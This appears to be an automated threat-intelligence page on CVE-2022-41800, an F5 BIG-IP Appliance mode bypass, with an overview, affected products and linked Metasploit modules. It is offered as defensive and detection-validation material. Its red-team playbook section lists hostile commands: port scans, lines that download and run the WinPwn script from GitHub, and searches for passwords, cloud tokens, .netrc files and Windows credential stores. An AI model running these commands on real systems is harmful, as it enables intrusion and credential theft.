CVE-2022-41800
Overview
This vulnerability is an authentication bypass caused by improper access control in the iControl REST interface of F5 BIG-IP when operating in Appliance mode. The root cause lies in an undisclosed iControl REST endpoint that does not enforce Appliance mode restrictions for users assigned the Administrator role. The affected component is the iControl REST API within BIG-IP's Appliance mode functionality, allowing privilege escalation across security boundaries.
Vulnerability Description
In all versions of BIG-IP, when running in Appliance mode, an authenticated user assigned the Administrator role may be able to bypass Appliance mode restrictions, utilizing an undisclosed iControl REST endpoint. A successful exploit can allow the attacker to cross a security boundary. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.
Impact
An authenticated user with Administrator privileges can exploit this flaw to circumvent Appliance mode restrictions, effectively crossing security boundaries within the system. This enables unauthorized access to sensitive configurations or operations normally restricted in Appliance mode. The attack requires valid Administrator credentials and network access to the REST interface. The CVSS vector (AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N) indicates network attack with high privileges and no user interaction, resulting in complete confidentiality and integrity compromise within the scope.
Solution
F5 Networks has released patches addressing this vulnerability as detailed in their security advisory K13325942. Users should upgrade affected BIG-IP Access Policy Manager installations to the fixed versions specified in the advisory, including version 17.0.0 and later patched releases. The advisory provides step-by-step patch application instructions and recommends verifying Appliance mode enforcement post-update to ensure the bypass is mitigated.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in question pertains to a significant security flaw within the BIG-IP product suite, specifically when operating in Appliance mode. This issue arises from an authenticated user, assigned the Administrator role, being able to bypass the restrictions typically enforced by Appliance mode through the exploitation of an undisclosed iControl REST endpoint. The ability to circumvent these restrictions poses a serious risk, as it allows unauthorized access to sensitive areas of the system, effectively crossing established security boundaries. The implications of this flaw are exacerbated by the fact that it affects multiple components of the BIG-IP suite, including the Access Policy Manager, Application Security Manager, and Local Traffic Manager, among others.
Exploitation of this vulnerability can occur through various attack vectors. An attacker with legitimate administrative credentials could leverage this flaw to gain unauthorized access to restricted functionalities or data. For instance, an attacker could manipulate the iControl REST API to execute commands or retrieve sensitive information that should be inaccessible under normal operational constraints. This scenario highlights the critical need for robust access controls and monitoring mechanisms, as the exploitation may not only compromise the integrity of the system but also allow for further attacks within the network.
The real-world impact of this vulnerability is profound, particularly for organizations that rely on BIG-IP for critical application delivery and security functions. The potential for data breaches, unauthorized access to sensitive information, and disruption of services can lead to significant business risks, including financial losses, reputational damage, and regulatory penalties. Organizations may find themselves facing increased scrutiny from stakeholders and regulatory bodies, especially if exploited vulnerabilities lead to data leaks or service outages. The high CVSS score of 8.7 reflects the severity of the risk, underscoring the urgency for organizations to address this vulnerability proactively.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-faceted approach. Regular audits of user roles and permissions are essential to ensure that only authorized personnel have administrative access. Additionally, monitoring and logging of API calls can help identify unusual patterns of behavior indicative of exploitation attempts. Organizations should also consider employing network segmentation to limit the potential impact of a successful attack. Furthermore, applying patches and updates provided by the vendor is crucial, as these updates often contain fixes for known vulnerabilities.
In conclusion, the vulnerability within the BIG-IP product suite presents a serious threat to organizations leveraging these systems for application delivery and security. The ability for an authenticated user to bypass Appliance mode restrictions through an undisclosed endpoint highlights the need for stringent access controls and monitoring. By understanding the potential attack vectors, assessing the real-world implications, and implementing robust detection and mitigation strategies, organizations can better protect themselves against the risks posed by this vulnerability and safeguard their critical assets.
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2022-41800 within F5 BIG-IP environments operating in Appliance mode. Our telemetry indicates a doubling in detection frequency, reflecting increased adversary interest and operational activity leveraging the undisclosed iControl REST endpoint to bypass Appliance mode restrictions. Notably, the persistence of stable EPSS scoring alongside this surge suggests that while exploit attempts are intensifying, the overall exploitability risk remains consistent with prior assessments. The emergence of multiple Metasploit modules facilitating both local privilege escalation and remote code execution underscores the expanding toolkit available to threat actors, increasing the likelihood of successful compromise following authentication. This development elevates the threat landscape by broadening the attack surface and simplifying exploitation pathways, particularly for actors with legitimate administrative credentials. Consequently, defenders should recognize this vulnerability as a heightened priority due to the increased exploitation cadence and the potential for attackers to gain unauthorized elevated access, which could lead to significant security boundary breaches and operational disruption.
Update 2 — August 03, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2022-41800, with telemetry indicating a doubling in activity over recent monitoring periods. This surge is accompanied by the emergence of refined Metasploit modules that facilitate both privilege escalation and persistent access on affected F5 BIG-IP systems. Notably, these updated tools streamline exploitation workflows, reducing the complexity and time required for attackers to bypass Appliance mode restrictions via the undisclosed iControl REST endpoint. The persistence of high EPSS scores underscores the sustained attractiveness of this vulnerability to threat actors. For defenders, this intensification signals an elevated risk environment where adversaries with administrative credentials can more readily achieve unauthorized root-level access, increasing the likelihood of impactful security boundary breaches. Consequently, the threat level associated with CVE-2022-41800 has risen, reflecting both the growing exploitation cadence and the enhanced sophistication of available attack frameworks.
Affected Products (51)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
F5 | Big-Ip Access Policy Manager | All |
cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Access Policy Manager | All |
cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Access Policy Manager | All |
cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Access Policy Manager | All |
cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Access Policy Manager | 17.0.0 |
cpe:2.3:a:f5:big-ip_access_policy_manager:17.0.0:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Advanced Firewall Manager | All |
cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Analytics | All |
cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Analytics | All |
cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Analytics | All |
cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Analytics | All |
cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Analytics | 17.0.0 |
cpe:2.3:a:f5:big-ip_analytics:17.0.0:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Application Acceleration Manager | All |
cpe:2.3:a:f5:big-ip_application_acceleration_manager:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Application Acceleration Manager | All |
cpe:2.3:a:f5:big-ip_application_acceleration_manager:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Application Acceleration Manager | All |
cpe:2.3:a:f5:big-ip_application_acceleration_manager:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Application Acceleration Manager | All |
cpe:2.3:a:f5:big-ip_application_acceleration_manager:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Application Acceleration Manager | 17.0.0 |
cpe:2.3:a:f5:big-ip_application_acceleration_manager:17.0.0:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Application Security Manager | All |
cpe:2.3:a:f5:big-ip_application_security_manager:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Application Security Manager | All |
cpe:2.3:a:f5:big-ip_application_security_manager:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Application Security Manager | All |
cpe:2.3:a:f5:big-ip_application_security_manager:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Application Security Manager | All |
cpe:2.3:a:f5:big-ip_application_security_manager:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (4)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
F5 BIG-IP iControl Authenticated RCE via RPM Creator
exploits/linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800
|
Ron Bowes | Unknown | unix, linux | View |
|
F5 Big-IP Create Admin User
exploits/linux/local/f5_create_user
|
Ron Bowes | Unknown | unix, linux, python | View |
|
F5 BIG-IP iControl CSRF File Write SOAP API
exploits/linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622
|
Ron Bowes | Unknown | unix, linux | View |
|
F5 Big-IP Gather Information from MCP Datastore
post/linux/gather/f5_loot_mcp
|
Ron Bowes | Unknown | linux, unix | View |
Threat Feed
7 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2022-41800 |
| support.f5.com |
GitHub CVE
|
https://support.f5.com/csp/article/K13325942 |